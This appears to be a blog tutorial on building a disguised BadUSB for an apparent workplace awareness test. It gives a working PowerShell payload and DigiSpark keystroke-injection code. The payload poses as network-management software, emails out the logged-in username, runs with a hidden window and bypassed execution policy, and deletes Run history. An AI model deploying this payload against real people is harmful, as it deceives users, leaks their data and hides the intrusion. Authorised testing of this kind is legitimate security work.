So let’s look at the first thing. What do we want to do with our potential victims of this kind of attack? Obviously, we don’t want to do something that may potentially compromise our employer’s systems nor do we want to do anything that may get us caught. I think a script to send me an email with the username of who’s plugged the device into their computer should be a good one. Looking into this I found a few GitHub repos that have a variety of attack options, however, this one appeared to be one used by a lot of people: GitHub – CedArctic/DigiSpark-Scripts: USB Rubber Ducky type scripts written for the DigiSpark.

I decided to take advantage of Windows which has email functionality baked-in through .NET so a Powershell script was the obvious choice. At work, we recently replaced our networking infrastructure with a new vendor so I could take care of the third point with this too by posing the USB as some software to allow the IT Team to manage the network. After some messing about with Powershell here’s the script I came up with:

$StartingPopup = New-Object -ComObject Wscript.Shell
$StartingPopup.Popup("Network Management Software is being installed, please wait...",0,"Software Installing",0x1)

$LoggedInUser = $env:UserName
$User = "hackeddevice@test.com"
$password = Get-Content ".\EmailPwd.txt" | ConvertTo-SecureString -Key (Get-Content ".\EmailKey.aes")
$credential = New-Object System.Management.Automation.PSCredential $User, $password

## Define the Send-MailMessage parameters
$mailParams = @{
    SmtpServer                 = 'smtp.office365.com'
    Port                       = '587' 
    UseSSL                     = $true 
    Credential                 = $credential
    From                       = 'hackeddevice@test.com'
    To                         = 'talan@test.com
    Subject                    = "USB has been plugged in"
    Body                       = 'USB has been plugged in by ' + $LoggedInUser
    DeliveryNotificationOption = 'OnFailure', 'OnSuccess'
}

## Send the message
Send-MailMessage @mailParams

$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("$Home\Desktop\Network Management System.lnk")
$Shortcut.IconLocation=".\Logo.ico"
$Shortcut.TargetPath = "https://manage.nms.com"
$Shortcut.Save()

##clean up run commands
$RunList = Get-ItemProperty -path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "MRUList"
$LatestRun = $RunList.MRUList.SubString(0,1)
Remove-ItemProperty -path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name $LatestRun

$CompletionPopup = New-Object -ComObject Wscript.Shell
$CompletionPopup.Popup("Network Management Software has been installed. There is a shortcut on your desktop.",0,"Software Installed",0x1)

A pretty simple Powershell script that pulls the logged-in username sets up some mail parameters and sends a mail, creates a shortcut on the users desktop and then displays a popup box to show that the “software” has been installed. The credentials have been encrypted using the following guide: https://www.altaro.com/msp-dojo/encrypt-password-powershell/

Right so to save me setting up a hosting server for these files I’m going to put them on a shared drive as I have access to it. If you were doing this for an organisation you didn’t have this access to, you’d need to set up a hosting server with the following files and probably use some unauthenticated SMTP Server to save on requiring encrypted credentials:

  1. Powershell script
  2. Shortcut Icon

Now we need to create use/modify the script from the GitHub repo above for executing a Powershell script and put it onto our USB Rubber Ducky: https://github.com/CedArctic/DigiSpark-Scripts/blob/master/Execute_Powershell_Script/Execute_Powershell_Script.ino

The main thing here for me is to remove the download client functions as we’re storing our file on a share that all users can access and then change the Execution Policy to allow the script to run and run it. So for us the Arduino code looks like this: 

DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(100);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(400);
  DigiKeyboard.print("powershell.exe -ExecutionPolicy \"Unrestricted\" -WindowStyle \"hidden\" -File \"S:\\IT Services\\TalsScripts\\EmailScript.ps1\"");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);

We’re now onto the final stage, we’ve configured the device and created the relevant scripts we want to run however, we still have just an exposed logic board and it certainly looks very dodgy. To sort this one out I called on my previous knowledge of 3D printing, time to hit Thingiverse to see what’s available. Again quite quickly I stumbled across this STL file that seemed to have everything I needed: https://cults3d.com/en/3d-model/tool/digispark-attiny85-badusb-fake-usb-memory-case-remix. I got one of these printed at a local 3D printer shop and found the tolerances to be just a bit too tight. The board fitted but it felt like I was going to break it and the back piece wouldn’t connect to its slot without some filing, also getting the print of the bed of the printer caused some warping due to the top being so thin. I, therefore, went to Tinkercad to modify the STL file by increasing the size of the base by .15mm all the way around and increasing the height by 1mm. I also increased the height of the top by 1mm so it would fit into its slot.

So there we have it, a Rubber Ducky device set up to execute a Powershell script on plug into a computer that looks like a normal USB drive and for under £10 a device.